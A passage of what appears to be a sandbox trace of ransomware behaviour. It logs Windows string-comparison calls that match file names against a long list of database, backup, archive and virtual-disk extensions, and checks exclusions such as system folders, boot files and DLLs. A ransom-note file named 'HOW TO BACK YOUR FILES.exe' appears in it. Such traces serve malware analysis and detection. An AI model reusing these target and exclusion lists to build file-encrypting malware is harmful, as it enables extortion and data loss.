lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0039.946] lstrlenW (lpString="abs") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0039.946] lstrlenW (lpString="abx") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0039.946] lstrlenW (lpString="accdb") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0039.946] lstrlenW (lpString="accdc") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0039.946] lstrlenW (lpString="accde") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0039.946] lstrlenW (lpString="accdr") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0039.946] lstrlenW (lpString="accdt") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0039.946] lstrlenW (lpString="accdw") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0039.946] lstrlenW (lpString="accft") returned 5 [0039.946] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0039.946] lstrlenW (lpString="adb") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.946] lstrlenW (lpString="adb") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0039.946] lstrlenW (lpString="ade") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0039.946] lstrlenW (lpString="adf") returned 3 [0039.946] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0039.946] lstrlenW (lpString="adn") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0039.947] lstrlenW (lpString="adp") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0039.947] lstrlenW (lpString="alf") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0039.947] lstrlenW (lpString="ask") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0039.947] lstrlenW (lpString="btr") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0039.947] lstrlenW (lpString="cat") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0039.947] lstrlenW (lpString="cdb") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0039.947] lstrlenW (lpString="ckp") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0039.947] lstrlenW (lpString="cma") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0039.947] lstrlenW (lpString="cpd") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0039.947] lstrlenW (lpString="dacpac") returned 6 [0039.947] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0039.947] lstrlenW (lpString="dad") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0039.947] lstrlenW (lpString="dadiagrams") returned 10 [0039.947] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0039.947] lstrlenW (lpString="daschema") returned 8 [0039.947] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0039.947] lstrlenW (lpString="db-journal") returned 10 [0039.947] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0039.947] lstrlenW (lpString="db-shm") returned 6 [0039.947] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0039.947] lstrlenW (lpString="db-wal") returned 6 [0039.947] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0039.947] lstrlenW (lpString="dbc") returned 3 [0039.947] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0039.947] lstrlenW (lpString="dbs") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0039.948] lstrlenW (lpString="dbt") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0039.948] lstrlenW (lpString="dbv") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0039.948] lstrlenW (lpString="dbx") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0039.948] lstrlenW (lpString="dcb") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0039.948] lstrlenW (lpString="dct") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0039.948] lstrlenW (lpString="dcx") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0039.948] lstrlenW (lpString="ddl") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0039.948] lstrlenW (lpString="dlis") returned 4 [0039.948] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0039.948] lstrlenW (lpString="dp1") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0039.948] lstrlenW (lpString="dqy") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0039.948] lstrlenW (lpString="dsk") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0039.948] lstrlenW (lpString="dsn") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0039.948] lstrlenW (lpString="dtsx") returned 4 [0039.948] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0039.948] lstrlenW (lpString="dxl") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0039.948] lstrlenW (lpString="eco") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0039.948] lstrlenW (lpString="ecx") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0039.948] lstrlenW (lpString="edb") returned 3 [0039.948] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0039.948] lstrlenW (lpString="epim") returned 4 [0039.948] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0039.948] lstrlenW (lpString="fcd") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0039.949] lstrlenW (lpString="fdb") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0039.949] lstrlenW (lpString="fic") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0039.949] lstrlenW (lpString="flexolibrary") returned 12 [0039.949] lstrlenW (lpString="fm5") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0039.949] lstrlenW (lpString="fmp") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0039.949] lstrlenW (lpString="fmp12") returned 5 [0039.949] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0039.949] lstrlenW (lpString="fmpsl") returned 5 [0039.949] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0039.949] lstrlenW (lpString="fol") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0039.949] lstrlenW (lpString="fp3") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0039.949] lstrlenW (lpString="fp4") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0039.949] lstrlenW (lpString="fp5") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0039.949] lstrlenW (lpString="fp7") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0039.949] lstrlenW (lpString="fpt") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0039.949] lstrlenW (lpString="frm") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0039.949] lstrlenW (lpString="gdb") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.949] lstrlenW (lpString="gdb") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0039.949] lstrlenW (lpString="grdb") returned 4 [0039.949] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0039.949] lstrlenW (lpString="gwi") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0039.949] lstrlenW (lpString="hdb") returned 3 [0039.949] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0039.950] lstrlenW (lpString="his") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0039.950] lstrlenW (lpString="ib") returned 2 [0039.950] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0039.950] lstrlenW (lpString="idb") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0039.950] lstrlenW (lpString="ihx") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0039.950] lstrlenW (lpString="itdb") returned 4 [0039.950] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0039.950] lstrlenW (lpString="itw") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0039.950] lstrlenW (lpString="jet") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0039.950] lstrlenW (lpString="jtx") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0039.950] lstrlenW (lpString="kdb") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0039.950] lstrlenW (lpString="kexi") returned 4 [0039.950] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0039.950] lstrlenW (lpString="kexic") returned 5 [0039.950] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0039.950] lstrlenW (lpString="kexis") returned 5 [0039.950] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0039.950] lstrlenW (lpString="lgc") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0039.950] lstrlenW (lpString="lwx") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0039.950] lstrlenW (lpString="maf") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0039.950] lstrlenW (lpString="maq") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0039.950] lstrlenW (lpString="mar") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0039.950] lstrlenW (lpString="marshal") returned 7 [0039.950] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0039.950] lstrlenW (lpString="mas") returned 3 [0039.950] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0039.951] lstrlenW (lpString="mav") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0039.951] lstrlenW (lpString="maw") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0039.951] lstrlenW (lpString="mdbhtml") returned 7 [0039.951] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0039.951] lstrlenW (lpString="mdn") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0039.951] lstrlenW (lpString="mdt") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0039.951] lstrlenW (lpString="mfd") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0039.951] lstrlenW (lpString="mpd") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0039.951] lstrlenW (lpString="mrg") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0039.951] lstrlenW (lpString="mud") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0039.951] lstrlenW (lpString="mwb") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0039.951] lstrlenW (lpString="myd") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0039.951] lstrlenW (lpString="ndf") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0039.951] lstrlenW (lpString="nnt") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0039.951] lstrlenW (lpString="nrmlib") returned 6 [0039.951] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0039.951] lstrlenW (lpString="ns2") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0039.951] lstrlenW (lpString="ns3") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0039.951] lstrlenW (lpString="ns4") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0039.951] lstrlenW (lpString="nsf") returned 3 [0039.951] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0039.951] lstrlenW (lpString="nv") returned 2 [0039.951] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0039.952] lstrlenW (lpString="nv2") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0039.952] lstrlenW (lpString="nwdb") returned 4 [0039.952] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0039.952] lstrlenW (lpString="nyf") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0039.952] lstrlenW (lpString="odb") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.952] lstrlenW (lpString="odb") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0039.952] lstrlenW (lpString="oqy") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0039.952] lstrlenW (lpString="ora") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0039.952] lstrlenW (lpString="orx") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0039.952] lstrlenW (lpString="owc") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0039.952] lstrlenW (lpString="p96") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0039.952] lstrlenW (lpString="p97") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0039.952] lstrlenW (lpString="pan") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0039.952] lstrlenW (lpString="pdb") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0039.952] lstrlenW (lpString="pdm") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0039.952] lstrlenW (lpString="pnz") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0039.952] lstrlenW (lpString="qry") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0039.952] lstrlenW (lpString="qvd") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0039.952] lstrlenW (lpString="rbf") returned 3 [0039.952] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0039.952] lstrlenW (lpString="rctd") returned 4 [0039.952] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0039.952] lstrlenW (lpString="rod") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0039.953] lstrlenW (lpString="rodx") returned 4 [0039.953] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0039.953] lstrlenW (lpString="rpd") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0039.953] lstrlenW (lpString="rsd") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0039.953] lstrlenW (lpString="sas7bdat") returned 8 [0039.953] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0039.953] lstrlenW (lpString="sbf") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0039.953] lstrlenW (lpString="scx") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0039.953] lstrlenW (lpString="sdb") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0039.953] lstrlenW (lpString="sdc") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0039.953] lstrlenW (lpString="sdf") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0039.953] lstrlenW (lpString="sis") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0039.953] lstrlenW (lpString="spq") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0039.953] lstrlenW (lpString="te") returned 2 [0039.953] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0039.953] lstrlenW (lpString="teacher") returned 7 [0039.953] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0039.953] lstrlenW (lpString="tmd") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0039.953] lstrlenW (lpString="tps") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0039.953] lstrlenW (lpString="trc") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.953] lstrlenW (lpString="trc") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0039.953] lstrlenW (lpString="trm") returned 3 [0039.953] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0039.953] lstrlenW (lpString="udb") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0039.954] lstrlenW (lpString="udl") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0039.954] lstrlenW (lpString="usr") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0039.954] lstrlenW (lpString="v12") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0039.954] lstrlenW (lpString="vis") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0039.954] lstrlenW (lpString="vpd") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0039.954] lstrlenW (lpString="vvv") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0039.954] lstrlenW (lpString="wdb") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0039.954] lstrlenW (lpString="wmdb") returned 4 [0039.954] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0039.954] lstrlenW (lpString="wrk") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0039.954] lstrlenW (lpString="xdb") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0039.954] lstrlenW (lpString="xld") returned 3 [0039.954] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0039.954] lstrlenW (lpString="xmlff") returned 5 [0039.954] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0039.954] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x497a4c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.954] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.954] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="aoldtz.exe") returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".") returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="..") returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="windows") returned -1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="bootmgr") returned 1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="temp") returned -1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="pagefile.sys") returned -1 [0039.954] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="boot") returned 1 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ids.txt") returned 1 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="ntuser.dat") returned -1 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="perflogs") returned -1 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="MSBuild") returned -1 [0039.955] lstrlenW (lpString="Kalimba.mp3") returned 11 [0039.955] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 46 [0039.955] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="Kalimba.mp3" | out: lpString1="Kalimba.mp3") returned="Kalimba.mp3" [0039.955] lstrlenW (lpString="Kalimba.mp3") returned 11 [0039.955] lstrlenW (lpString="Ares865") returned 7 [0039.955] lstrcmpiW (lpString1="mba.mp3", lpString2="Ares865") returned 1 [0039.955] lstrlenW (lpString=".dll") returned 4 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".dll") returned 1 [0039.955] lstrlenW (lpString=".lnk") returned 4 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".lnk") returned 1 [0039.955] lstrlenW (lpString=".ini") returned 4 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".ini") returned 1 [0039.955] lstrlenW (lpString=".sys") returned 4 [0039.955] lstrcmpiW (lpString1="Kalimba.mp3", lpString2=".sys") returned 1 [0039.955] lstrlenW (lpString="Kalimba.mp3") returned 11 [0039.955] lstrlenW (lpString="bak") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="bak") returned 1 [0039.955] lstrlenW (lpString="ba_") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="ba_") returned 1 [0039.955] lstrlenW (lpString="dbb") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="dbb") returned 1 [0039.955] lstrlenW (lpString="vmdk") returned 4 [0039.955] lstrcmpiW (lpString1=".mp3", lpString2="vmdk") returned -1 [0039.955] lstrlenW (lpString="rar") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="rar") returned -1 [0039.955] lstrlenW (lpString="zip") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="zip") returned -1 [0039.955] lstrlenW (lpString="tgz") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="tgz") returned -1 [0039.955] lstrlenW (lpString="vbox") returned 4 [0039.955] lstrcmpiW (lpString1=".mp3", lpString2="vbox") returned -1 [0039.955] lstrlenW (lpString="vdi") returned 3 [0039.955] lstrcmpiW (lpString1="mp3", lpString2="vdi") returned -1 [0039.956] lstrlenW (lpString="vhd") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="vhd") returned -1 [0039.956] lstrlenW (lpString="vhdx") returned 4 [0039.956] lstrcmpiW (lpString1=".mp3", lpString2="vhdx") returned -1 [0039.956] lstrlenW (lpString="avhd") returned 4 [0039.956] lstrcmpiW (lpString1=".mp3", lpString2="avhd") returned -1 [0039.956] lstrlenW (lpString="db") returned 2 [0039.956] lstrcmpiW (lpString1="p3", lpString2="db") returned 1 [0039.956] lstrlenW (lpString="db2") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="db2") returned 1 [0039.956] lstrlenW (lpString="db3") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="db3") returned 1 [0039.956] lstrlenW (lpString="dbf") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="dbf") returned 1 [0039.956] lstrlenW (lpString="mdf") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="mdf") returned 1 [0039.956] lstrlenW (lpString="mdb") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="mdb") returned 1 [0039.956] lstrlenW (lpString="sql") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="sql") returned -1 [0039.956] lstrlenW (lpString="sqlite") returned 6 [0039.956] lstrcmpiW (lpString1="ba.mp3", lpString2="sqlite") returned -1 [0039.956] lstrlenW (lpString="sqlite3") returned 7 [0039.956] lstrcmpiW (lpString1="mba.mp3", lpString2="sqlite3") returned -1 [0039.956] lstrlenW (lpString="sqlitedb") returned 8 [0039.956] lstrcmpiW (lpString1="imba.mp3", lpString2="sqlitedb") returned -1 [0039.956] lstrlenW (lpString="xml") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="xml") returned -1 [0039.956] lstrlenW (lpString="$er") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="$er") returned 1 [0039.956] lstrlenW (lpString="4dd") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="4dd") returned 1 [0039.956] lstrlenW (lpString="4dl") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="4dl") returned 1 [0039.956] lstrlenW (lpString="^^^") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="^^^") returned 1 [0039.956] lstrlenW (lpString="abs") returned 3 [0039.956] lstrcmpiW (lpString1="mp3", lpString2="abs") returned 1 [0039.956] lstrlenW (lpString="abx") returned 3 [0039.957] lstrcmpiW (lpString1="mp3", lpString2="abx") returned 1 [0039.957] lstrlenW (lpString="accdb") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accdb") returned -1 [0039.957] lstrlenW (lpString="accdc") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accdc") returned -1 [0039.957] lstrlenW (lpString="accde") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accde") returned -1 [0039.957] lstrlenW (lpString="accdr") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accdr") returned -1 [0039.957] lstrlenW (lpString="accdt") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accdt") returned -1 [0039.957] lstrlenW (lpString="accdw") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accdw") returned -1 [0039.957] lstrlenW (lpString="accft") returned 5 [0039.957] lstrcmpiW (lpString1="a.mp3", lpString2="accft") returned -1 [0039.957] lstrlenW (lpString="adb") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0039.958] lstrlenW (lpString="adb") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="adb") returned 1 [0039.958] lstrlenW (lpString="ade") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="ade") returned 1 [0039.958] lstrlenW (lpString="adf") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="adf") returned 1 [0039.958] lstrlenW (lpString="adn") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="adn") returned 1 [0039.958] lstrlenW (lpString="adp") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="adp") returned 1 [0039.958] lstrlenW (lpString="alf") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="alf") returned 1 [0039.958] lstrlenW (lpString="ask") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="ask") returned 1 [0039.958] lstrlenW (lpString="btr") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="btr") returned 1 [0039.958] lstrlenW (lpString="cat") returned 3 [0039.958] lstrcmpiW (lpString1="mp3", lpString2="cat") returned 1 [0039.958] lstrlenW (lpString="cdb") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="cdb") returned 1 [0039.959] lstrlenW (lpString="ckp") returned 3 [0039.959] lstrcmpiW (lpString1="mp3", lpString2="ckp") returned 1 [0039.959] lstrlenW 